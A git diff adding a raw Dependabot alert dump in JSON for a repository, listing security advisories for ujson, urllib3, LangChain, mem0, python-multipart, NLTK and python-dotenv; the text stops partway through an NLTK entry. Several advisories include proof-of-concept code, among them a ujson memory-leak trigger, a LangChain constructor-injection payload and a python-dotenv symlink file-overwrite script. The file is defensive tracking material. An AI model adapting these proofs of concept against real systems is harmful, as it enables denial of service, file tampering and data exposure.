diff --git a/.planning/dependabot-alerts.json b/.planning/dependabot-alerts.json
new file mode 100644
index 00000000..2479215e
--- /dev/null
+++ b/.planning/dependabot-alerts.json
@@ -0,0 +1 @@
+[{"number":127,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"ujson"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-c38f-wx89-p2xg","cve_id":"CVE-2026-44660","summary":"UltraJSON has a Memory Leak in ujson.dump() on Write Failure","description":"### Summary\n\nWhen `ujson.dump()` writes to a file-like object and the write operation raises an exception, the serialized JSON string object is not decremented, leaking memory. Each failed write operation leaks the full size of the serialized payload.\n\nCode that uses `ujson.dumps()` rather than `ujson.dump()` or only JSON load/decode methods is unaffected.\n\n### Details\n\n**Vulnerability Location:**\n- `src/ujson/python/objToJSON.c:913` - `objToJSONFile()` function start\n- `src/ujson/python/objToJSON.c:931` - Error return on write failure\n- `src/ujson/python/objToJSON.c:942` - Early return without cleanup\n \n**Root Cause:**\n\nThe `objToJSONFile()` function allocates a Python string object via `ujson_dumps_internal()`, calls the file's `write()` method, and returns early if `write()` raises an exception—but never calls `Py_DECREF(string)` on the early exit path.\n\n### PoC\n```python\nimport gc, tracemalloc, ujson\n\nclass BadFile:\n def write(self, s):\n raise RuntimeError(\"boom\")\n\nobj = {\"x\": \"A\" * 200000}\n\ndef run():\n try:\n ujson.dump(obj, BadFile())\n except RuntimeError:\n pass\n\nrun()\ntracemalloc.start()\ngc.collect()\nbase = tracemalloc.get_traced_memory()[0]\n\nfor i in range(5):\n run()\n gc.collect()\n cur = tracemalloc.get_traced_memory()[0]\n print(i, cur - base)\n```\n\n### Impact\n\nAny application that serializes data through `ujson.dump()` to an attacker-influenced file-like object that can fail can be driven into linear memory growth. An attacker can quickly use up all the memory of say a web server that sends JSON responses using `ujson.dump()` by repeatedly making requests then closing the connection mid response.\n\n### Remediation\n\nThe missing dec-refs were added in 82af1d0ac01d09aa40c887b460d44b9d9f4bccd9. We recommend upgrading to [UltraJSON 5.12.1](https://github.com/ultrajson/ultrajson/releases/tag/5.12.1).\n\n### Workarounds\n\nReplacing `ujson.dump(obj, file)` with `file.write(ujson.dumps(obj))` is equivalent (contrary to popular misconception, there are no streaming benefits to using `ujson.dump()`) and will avoid the memory leak.","severity":"high","identifiers":[{"value":"GHSA-c38f-wx89-p2xg","type":"GHSA"},{"value":"CVE-2026-44660","type":"CVE"}],"references":[{"url":"https://github.com/ultrajson/ultrajson/security/advisories/GHSA-c38f-wx89-p2xg"},{"url":"https://github.com/ultrajson/ultrajson/commit/82af1d0ac01d09aa40c887b460d44b9d9f4bccd9"},{"url":"https://github.com/ultrajson/ultrajson/releases/tag/5.12.1"},{"url":"https://github.com/advisories/GHSA-c38f-wx89-p2xg"}],"published_at":"2026-05-12T22:25:11Z","updated_at":"2026-05-12T22:25:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":"<= 5.12.0","first_patched_version":{"identifier":"5.12.1"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","score":8.7}},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-401","name":"Missing Release of Memory after Effective Lifetime"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":"<= 5.12.0","first_patched_version":{"identifier":"5.12.1"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/127","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/127","created_at":"2026-05-13T05:27:19Z","updated_at":"2026-05-13T05:27:19Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":126,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"urllib3"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-qccp-gfcp-xxvc","cve_id":"CVE-2026-44431","summary":"urllib3: Sensitive headers forwarded across origins in proxied low-level redirects","description":"### Impact\n\nWhen following cross-origin redirects for requests made using urllib3’s high-level APIs, such as `urllib3.request()`, `PoolManager.request()`, and `ProxyManager.request()`, sensitive headers — `Authorization`, `Cookie`, and `Proxy-Authorization` (defined in `Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT`) — are stripped by default, as expected.\n\nHowever, cross-origin redirects followed from the low-level API via `ProxyManager.connection_from_url().urlopen(..., assert_same_host=False)` still forward these sensitive headers.\n\n### Affected usage\n\nApplications and libraries using urllib3 versions earlier than 2.7.0 may be affected if they allow cross-origin redirects while making requests through `HTTPConnection.urlopen()` instances created via `ProxyManager.connection_from_url()`.\n\n### Remediation\n\nUpgrade to urllib3 version 2.7.0 or later, in which sensitive headers are stripped from redirects followed by `HTTPConnection`.\n\nIf upgrading is not immediately possible, avoid using this low-level redirect flow for cross-origin redirects. If appropriate for your use case, switch to `ProxyManager.request()`.","severity":"high","identifiers":[{"value":"GHSA-qccp-gfcp-xxvc","type":"GHSA"},{"value":"CVE-2026-44431","type":"CVE"}],"references":[{"url":"https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc"},{"url":"https://github.com/advisories/GHSA-qccp-gfcp-xxvc"}],"published_at":"2026-05-11T14:51:20Z","updated_at":"2026-05-11T14:51:22Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.23, < 2.7.0","first_patched_version":{"identifier":"2.7.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N","score":8.2}},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-200","name":"Exposure of Sensitive Information to an Unauthorized Actor"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.23, < 2.7.0","first_patched_version":{"identifier":"2.7.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/126","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/126","created_at":"2026-05-13T05:27:19Z","updated_at":"2026-05-13T05:27:19Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":125,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-pjwx-r37v-7724","cve_id":"CVE-2026-44843","summary":"LangChain vulnerable to unsafe deserialization of attacker-controlled objects through overly broad `load()` allowlists","description":"LangChain contains older runtime code paths that deserialize run inputs, run outputs, or other application-controlled payloads using overly broad object allowlists. These paths may call `load()` with `allowed_objects=\"all\"`. This does not enable arbitrary Python object deserialization, but it does allow any trusted LangChain-serializable object to be revived, which is broader than these runtime paths require. As a result, attacker-supplied LangChain serialized constructor dictionaries may cause trusted runtime paths to instantiate classes with untrusted constructor arguments.\n\nApplications are exposed only when all of the following are true:\n\n1. The application accepts untrusted structured input, such as JSON, from a user or network request.\n2. The application does not validate or canonicalize that input into an inert schema before invoking LangChain.\n3. Attacker-controlled nested dictionaries or lists are preserved in LangChain run inputs or outputs.\n4. The application uses an affected API path that later deserializes that run data.\n\nKnown affected runtime surfaces include:\n\n- `RunnableWithMessageHistory`\n- `astream_log()`\n- `astream_events(version=\"v1\")`\n\nRelated unsafe deserialization patterns may also affect applications that explicitly load serialized LangChain prompt or runnable objects from untrusted sources, including shared prompt stores, Hub artifacts with model configuration, or other application-controlled serialization stores.\n\nApplications that validate incoming requests against a fixed schema, such as coercing user input to a plain string or message-content field before invoking LangChain, are unlikely to expose this deserialization primitive.\n\nThis release also fixes a related secret-marker validation bypass in the serialization and deserialization layer (`_is_lc_secret`). That issue creates an additional path by which attacker-controlled constructor dictionaries can avoid escaping during `dumps()` -> `loads()` round-trips and reach LangChain object revival logic.\n\n## Impact\n\nAn attacker who can submit untrusted structured input to an affected application, and have that structure preserved in LangChain run data, may be able to inject LangChain serialized constructor payloads such as:\n\n```json\n{\n \"lc\": 1,\n \"type\": \"constructor\",\n \"id\": [\"langchain_core\", \"messages\", \"ai\", \"AIMessage\"],\n \"kwargs\": {\"content\": \"attacker-controlled content\"}\n}\n```\n\nIf this payload reaches a broad `load()` call, LangChain may instantiate the referenced class instead of treating the payload as inert user data.\n\nRealistic impacts include:\n\n- Persistent chat-history poisoning when revived `AIMessage`, `HumanMessage`, or `SystemMessage` objects are stored by `RunnableWithMessageHistory`.\n- Prompt injection or behavior manipulation if attacker-controlled messages are later included in model context.\n- Instantiation of unexpected trusted LangChain objects with attacker-controlled constructor arguments.\n- Possible credential disclosure or server-side requests if a reachable object reads environment credentials, creates clients, or contacts attacker-controlled endpoints during initialization.\n- Additional prompt-template or runnable-configuration impacts in applications that separately load and execute untrusted serialized LangChain objects.\n\n## Remediation\n\nLangChain will deprecate the affected APIs as part of this fix:\n\n- `RunnableWithMessageHistory`\n- `astream_log()`\n- `astream_events(version=\"v1\")`\n\nThese are older code paths that are no longer recommended for new applications. They were not previously marked as deprecated, but recent LangChain documentation has primarily directed users toward newer streaming and memory patterns, including the `stream` API. Applications should migrate to the currently recommended APIs rather than continue depending on these older surfaces.\n\nSeparately, LangChain will update `load()` and `loads()` to tighten deserialization behavior so broad object revival is not applied implicitly to untrusted or application-controlled payloads. The older runtime surfaces listed above are being deprecated rather than preserved as supported paths for broad runtime deserialization.\n\nThis release also fixes a related secret-marker validation bypass in the serialization and deserialization layer (`_is_lc_secret`). That issue creates an additional path by which attacker-controlled constructor dictionaries can avoid escaping during `dumps()` -> `loads()` round-trips and reach LangChain object revival logic.\n\n## Guidance for `load()` and `loads()`\n\n`load()` and `loads()` should be used only with trusted LangChain manifests or serialized objects from trusted storage. Do not pass user-controlled data to `load()` or `loads()`, and do not use them as general parsers for request bodies, tool inputs, chat messages, or other attacker-controlled data.\n\n`load()` and `loads()` are beta APIs, and their behavior may change as LangChain narrows unsafe defaults. Future LangChain versions will require callers to be explicit about which objects may be revived. Users should pass a narrow `allowed_objects` value appropriate for the specific trusted manifest they are loading, rather than relying on broad defaults or `allowed_objects=\"all\"`, which permits the full trusted LangChain serialization allowlist.\n\n## Credits\n\nThe original issue was first reported by @u-ktdi.\n\nSimilar findings were reported by @dewankpant, @shrutilohani, @Moaaz-0x, @pucagit.\n\nA related `_is_lc_secret` marker bypass affecting `dumps()` -> `loads()` round-trips was reported by @yardenporat353 (and a similar report by @localhost-detect)","severity":"high","identifiers":[{"value":"GHSA-pjwx-r37v-7724","type":"GHSA"},{"value":"CVE-2026-44843","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-pjwx-r37v-7724"},{"url":"https://github.com/advisories/GHSA-pjwx-r37v-7724"}],"published_at":"2026-05-08T23:07:32Z","updated_at":"2026-05-08T23:07:34Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":">= 1.0.0, <= 1.3.2","first_patched_version":{"identifier":"1.3.3"}},{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":"<= 0.3.84","first_patched_version":{"identifier":"0.3.85"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N","score":8.2},"cvss_v4":{"vector_string":null,"score":0.0}},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N","score":8.2},"cwes":[{"cwe_id":"CWE-502","name":"Deserialization of Untrusted Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":">= 1.0.0, <= 1.3.2","first_patched_version":{"identifier":"1.3.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/125","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/125","created_at":"2026-05-13T05:27:18Z","updated_at":"2026-05-13T05:27:18Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":124,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"mem0ai"},"manifest_path":"methods/EverCore/uv.lock","scope":"development","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-xqxw-r767-67m7","cve_id":"CVE-2026-7597","summary":"mem0ai mem0 has an Improper Input Validation Issue","description":"A vulnerability was found in mem0ai mem0 up to 1.0.11. This affects the function pickle.load/pickle.dump of the file mem0/vector_stores/faiss.py. Performing a manipulation results in deserialization. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The patch is named 62dca096f9236010ca15fea9ba369ba740b86b7a. Applying a patch is the recommended action to fix this issue.","severity":"low","identifiers":[{"value":"GHSA-xqxw-r767-67m7","type":"GHSA"},{"value":"CVE-2026-7597","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-7597"},{"url":"https://github.com/mem0ai/mem0/issues/3778"},{"url":"https://github.com/mem0ai/mem0/pull/4833"},{"url":"https://github.com/mem0ai/mem0/commit/62dca096f9236010ca15fea9ba369ba740b86b7a"},{"url":"https://github.com/mem0ai/mem0"},{"url":"https://vuldb.com/submit/805562"},{"url":"https://vuldb.com/vuln/360550"},{"url":"https://vuldb.com/vuln/360550/cti"},{"url":"https://github.com/advisories/GHSA-xqxw-r767-67m7"}],"published_at":"2026-05-02T00:31:21Z","updated_at":"2026-05-07T20:47:22Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"mem0ai"},"severity":"low","vulnerable_version_range":"< 2.0.0b2","first_patched_version":{"identifier":"2.0.0b2"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L","score":6.3},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P","score":2.1}},"epss":{"percentage":0.00058,"percentile":0.17791},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L","score":6.3},"cwes":[{"cwe_id":"CWE-20","name":"Improper Input Validation"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"mem0ai"},"severity":"low","vulnerable_version_range":"< 2.0.0b2","first_patched_version":{"identifier":"2.0.0b2"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/124","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/124","created_at":"2026-05-13T05:27:18Z","updated_at":"2026-05-13T05:27:18Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":123,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"python-multipart"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-pp6c-gr5w-3c5g","cve_id":"CVE-2026-42561","summary":"python-multipart has Denial of Service via unbounded multipart part headers","description":"### Summary\n\n`python-multipart` has a denial of service vulnerability in multipart part header parsing. When parsing `multipart/form-data`, `MultipartParser` previously had no limit on the number of part headers or the size of an individual part header. An attacker could send a request with either many repeated headers without terminating the header block or a single very large header value, causing excessive CPU work before request rejection or completion.\n\n### Impact\n\nApplications that parse attacker-controlled `multipart/form-data` with affected versions of `python-multipart` can experience CPU exhaustion. ASGI applications using Starlette, FastAPI, or other frameworks that invoke `python-multipart` may have worker or event-loop delays while processing malicious upload requests.\n\n### Details\n\nThe affected parser states are `HEADER_FIELD_START`, `HEADER_FIELD`, `HEADER_VALUE_START`, `HEADER_VALUE`, and `HEADER_VALUE_ALMOST_DONE`. The issue can be triggered by:\n\n- A multipart part with an oversized individual header value.\n- A multipart part with many repeated header lines or an unterminated header block.\n\nBoth variants are addressed by enforcing default parser limits for maximum header count and maximum header size.\n\n### Mitigation\n\nUpgrade to `python-multipart` `0.0.27` or later.\n\nIf upgrading is not immediately possible, reduce exposure by enforcing request body size limits at the server, proxy, or framework layer. This is only a mitigation; affected versions of `python-multipart` still parse multipart part headers without the default header count and header size limits.","severity":"high","identifiers":[{"value":"GHSA-pp6c-gr5w-3c5g","type":"GHSA"},{"value":"CVE-2026-42561","type":"CVE"}],"references":[{"url":"https://github.com/Kludex/python-multipart/security/advisories/GHSA-pp6c-gr5w-3c5g"},{"url":"https://github.com/advisories/GHSA-pp6c-gr5w-3c5g"}],"published_at":"2026-05-06T21:56:14Z","updated_at":"2026-05-06T21:56:16Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"high","vulnerable_version_range":"< 0.0.27","first_patched_version":{"identifier":"0.0.27"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"high","vulnerable_version_range":"< 0.0.27","first_patched_version":{"identifier":"0.0.27"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/123","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/123","created_at":"2026-05-13T05:27:18Z","updated_at":"2026-05-13T05:27:18Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":122,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-68j8-pq59-fqgm","cve_id":"CVE-2026-0847","summary":"NLTK has a Path Traversal issue","description":"A vulnerability in NLTK versions up to and including 3.9.2 allows arbitrary file read via path traversal in multiple CorpusReader classes, including WordListCorpusReader, TaggedCorpusReader, and BracketParseCorpusReader. These classes fail to properly sanitize or validate file paths, enabling attackers to traverse directories and access sensitive files on the server. This issue is particularly critical in scenarios where user-controlled file inputs are processed, such as in machine learning APIs, chatbots, or NLP pipelines. Exploitation of this vulnerability can lead to unauthorized access to sensitive files, including system files, SSH private keys, and API tokens, and may potentially escalate to remote code execution when combined with other vulnerabilities.","severity":"high","identifiers":[{"value":"GHSA-68j8-pq59-fqgm","type":"GHSA"},{"value":"CVE-2026-0847","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-0847"},{"url":"https://huntr.com/bounties/fc69914f-36a9-4c18-8503-10013b39f966"},{"url":"https://github.com/advisories/GHSA-68j8-pq59-fqgm"}],"published_at":"2026-03-04T21:32:45Z","updated_at":"2026-05-06T19:18:18Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 3.9.2","first_patched_version":null}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","score":8.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.0008,"percentile":0.23316},"cvss":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","score":8.6},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 3.9.2","first_patched_version":null},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/122","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/122","created_at":"2026-05-13T05:27:18Z","updated_at":"2026-05-13T05:27:18Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":121,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"python-dotenv"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-mf9w-mj56-hr94","cve_id":"CVE-2026-28684","summary":"python-dotenv: Symlink following in set_key allows arbitrary file overwrite via cross-device rename fallback","description":"### Summary\n\n`set_key()` and `unset_key()` in python-dotenv follow symbolic links when rewriting `.env` files, allowing a local attacker to overwrite arbitrary files via a crafted symlink when a cross-device rename fallback is triggered.\n\n\n### Details\n\nThe `rewrite()` context manager in `dotenv/main.py` is used by both `set_key()` and `unset_key()` to safely modify `.env` files. It works by writing to a temporary file (created in the system's default temp directory, typically `/tmp`) and then using `shutil.move()` to replace the original file.\n\nWhen the `.env` path is a symbolic link and the temp directory resides on a different filesystem than the target (a common configuration on Linux systems using tmpfs for `/tmp`), the following sequence occurs:\n\n1. `shutil.move()` first attempts `os.rename()`, which fails with an `OSError` because atomic renames cannot cross device boundaries.\n2. On failure, `shutil.move()` falls back to `shutil.copy2()` followed by `os.unlink()`.\n3. `shutil.copy2()` calls `shutil.copyfile()` with `follow_symlinks=True` by default.\n4. This causes the content to be written to the **symlink target** rather than replacing the symlink itself.\n\nAn attacker who has write access to the directory containing a `.env` file can pre-place a symlink pointing to any file that the application process has write access to. When the application (or a privileged process such as a deploy script, Docker entrypoint, or CI pipeline) calls `set_key()` or `unset_key()`, the symlink target is overwritten with the new `.env` content.\n\nThis vulnerability does not require a race condition and is fully deterministic once the preconditions are met.\n\n### Impact\nThe primary impacts are to **integrity** and **availability**:\n\n- **File overwrite / destruction (DoS):** An attacker can cause an application or privileged process to corrupt or destroy configuration files, database configs, or other sensitive files it would not normally have access to modify.\n- **Integrity violation:** The target file's original content is replaced with `.env`-formatted content controlled by the attacker.\n- **Potential privilege escalation:** In scenarios where a privileged process (running as root or a service account) calls `set_key()`, the attacker can leverage this to write to files beyond their own access level.\n\nThe scope of impact depends on the application using python-dotenv and the privileges under which it runs.\n\n\n### Proof of Concept\n\nThe following script demonstrates the vulnerability. It requires `/tmp` and the user's home directory to reside on different devices (common on systemd-based Linux systems with tmpfs).\n\n```python\nimport os\nimport sys\nimport tempfile\nfrom dotenv import set_key\n\n# Pre-condition: /tmp must be on a different device than the target directory.\ntmp_dev = os.stat(\"/tmp\").st_dev\nhome_dev = os.stat(os.path.expanduser(\"~\")).st_dev\nassert tmp_dev != home_dev, \"Skipped: /tmp and ~ are on the same device (no cross-device move)\"\n\nwith tempfile.TemporaryDirectory(dir=os.path.expanduser(\"~\")) as workdir:\n # File an attacker wants to overwrite\n target = os.path.join(workdir, \"victim_config.txt\")\n with open(target, \"w\") as f:\n f.write(\"DB_PASSWORD=supersecret\\n\")\n\n # Attacker pre-places a symlink at the path the application will use as .env\n env_symlink = os.path.join(workdir, \".env\")\n os.symlink(target, env_symlink)\n\n before = open(target).read()\n\n # Application writes a new key -- triggers the cross-device fallback\n set_key(env_symlink, \"INJECTED\", \"attacker_value\")\n\n after = open(target).read()\n\n print(\"Before:\", repr(before))\n print(\"After: \", repr(after))\n print(\"Symlink target overwritten:\", target)\n```\n\n**Expected output:**\n```\nBefore: 'DB_PASSWORD=supersecret\\n'\nAfter: \"DB_PASSWORD=supersecret\\nINJECTED='attacker_value'\\n\"\nSymlink target overwritten: /home/user/tmp806nut2g/victim_config.txt\n```\n\n### Remediation\n\nThe fix changes the `rewrite()` context manager in the following ways:\n\n1. **Symlinks are no longer followed by default.** When the `.env` path is a symlink, `rewrite()` now resolves it to the real path before proceeding, or (by default) operates on the symlink entry itself rather than the target.\n2. **A `follow_symlinks: bool = False` parameter** is added to `set_key()` and `unset_key()` for users who explicitly need the old behavior.\n3. **Temp files are written in the same directory** as the target `.env` file (instead of the system temp directory), eliminating the cross-device rename condition entirely.\n4. **`os.replace()` is used instead of `shutil.move()`**, providing atomic replacement without symlink-following fallback behavior.\n\nUsers are advised to upgrade to the patched version as soon as it is available on PyPI.\n\n### Timeline\n\n| Date | Event |\n| ------------ | ---------------------------------------------------------------------------------------------------- |\n| 2026-01-09 | Initial report received from Giorgos Tsigourakos regarding a separate, unrelated issue also located in `rewrite()` |\n| 2026-01-10 | Co-maintainer acknowledged report, requested clarification |\n| 2026-01-11 | Initial report assessed as not exploitable and closed |\n| 2026-02-24 | Reporter identified new, distinct cross-device symlink attack vector with deterministic exploitation |\n| 2026-02-26 | Co-maintainer confirmed vulnerability and shared draft patch |\n| 2026-02-26 | Reporter validated fix with monkeypatched PoC, proposed CVSS |\n| 2026-03-01 | Patch merged to main |\n| 2026-03-01 | Patched version released to PyPI |\n| 2026-04-20 | Advisory published |\n\n### Patches\n\nUpgrade to v.1.2.2 or use the patch from https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311.patch","severity":"medium","identifiers":[{"value":"GHSA-mf9w-mj56-hr94","type":"GHSA"},{"value":"CVE-2026-28684","type":"CVE"}],"references":[{"url":"https://github.com/theskumar/python-dotenv/security/advisories/GHSA-mf9w-mj56-hr94"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28684"},{"url":"https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311"},{"url":"https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311.patch"},{"url":"https://github.com/theskumar/python-dotenv/releases/tag/v1.2.2"},{"url":"https://github.com/advisories/GHSA-mf9w-mj56-hr94"}],"published_at":"2026-04-21T14:38:57Z","updated_at":"2026-04-21T14:38:59Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"python-dotenv"},"severity":"medium","vulnerable_version_range":"< 1.2.2","first_patched_version":{"identifier":"1.2.2"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H","score":6.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.0001,"percentile":0.01226},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H","score":6.6},"cwes":[{"cwe_id":"CWE-59","name":"Improper Link Resolution Before File Access ('Link Following')"},{"cwe_id":"CWE-61","name":"UNIX Symbolic Link (Symlink) Following"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"python-dotenv"},"severity":"medium","vulnerable_version_range":"< 1.2.2","first_patched_version":{"identifier":"1.2.2"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/121","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/121","created_at":"2026-05-13T05:27:18Z","updated_at":"2026-05-13T05:27:18Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":120,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-h8wq-7xc4-p3qx","cve_id":"CVE-2026-0846","summary":"NLTK has Arbitrary File Read via Absolute Path Input in nltk.util.filestring()","description":"A vulnerability in the `filestring()` function of the `nltk.util` module in nltk version 3.9.2 allows arbitrary file read due to improper validation of input paths. The function directly opens files specified by user input without sanitization, enabling attackers to access sensitive system files by providing absolute paths or traversal paths. This vulnerability can be exploited locally or remotely, particularly in scenarios where the function is used in web APIs or other interfaces that accept user-supplied input.","severity":"high","identifiers":[{"value":"GHSA-h8wq-7xc4-p3qx","type":"GHSA"},{"value":"CVE-2026-0846","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-0846"},{"url":"https://huntr.com/bounties/007b84f8-418e-4300-99d0-bf504c2f97eb"},{"url":"https://github.com/nltk/nltk/pull/3485"},{"url":"https://github.com/nltk/nltk/commit/b2e1164bf89277f79b65406c829b99fb20ca1974"},{"url":"https://github.com/advisories/GHSA-h8wq-7xc4-p3qx"}],"published_at":"2026-03-09T21:31:38Z","updated_at":"2026-04-18T01:14:19Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"< 3.9.3","first_patched_version":{"identifier":"3.9.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","score":8.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00084,"percentile":0.24208},"cvss":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","score":8.6},"cwes":[{"cwe_id":"CWE-36","name":"Absolute Path 